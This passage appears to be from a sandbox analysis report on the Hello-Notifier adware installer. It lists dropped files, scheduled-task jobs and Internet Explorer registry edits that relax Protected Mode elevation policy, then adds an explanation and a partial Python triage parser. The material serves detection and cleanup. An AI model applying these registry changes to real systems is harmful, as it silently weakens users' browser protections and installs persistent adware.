| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\37928.xpi | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Installer.log | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\utils.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\background.html | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Hello-Notifier\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Approved Extensions | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Isolation = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppName = "Hello-Notifier-enabler.exe-buttonutil64.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346}\AppName = "Hello-Notifier-enabler.exe-buttonutil.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
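The rows above are the interesting part of this report for anyone who has to clean up or hunt for this installer: the NSIS stub and Hello-Notifier-enabler.exe write Low Rights\ElevationPolicy entries (Policy = 3 means Protected Mode silently launches that broker at medium integrity, Policy = 1 means it launches silently at low integrity), set Internet Explorer\Main\Isolation to "PMIL" (legacy Protected Mode instead of Enhanced Protected Mode, so a 32-bit in-process BHO can load), register the BHO CLSID {11111111-1111-1111-1111-110311791128} with NoExplorer = 1 via regsvr32, plant .job files in C:\Windows\Tasks, and store Crossrider plugin JavaScript that pulls ad code over cleartext http:// from pages that are not HTTPS. The script below is an added example, not code from the report or from Hello-Notifier; it parses rows in the report's own "| Description | Indicator | Process | Target |" layout and pulls those facts out. The sample rows are copied from this page (the long Plugins\123\JavaScript value is abridged to its addRemoteJS call); the function names and the decoding table are mine.

```python
"""Triage helper for sandbox rows in the "| Description | Indicator | Process | Target |"
layout used above. Added example; not code from the report or from Hello-Notifier."""
import re

# Constructed sample input: rows copied from the report tables on this page. The
# Plugins\123\JavaScript value is abridged to its addRemoteJS() call.
SAMPLE_ROWS = r"""
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
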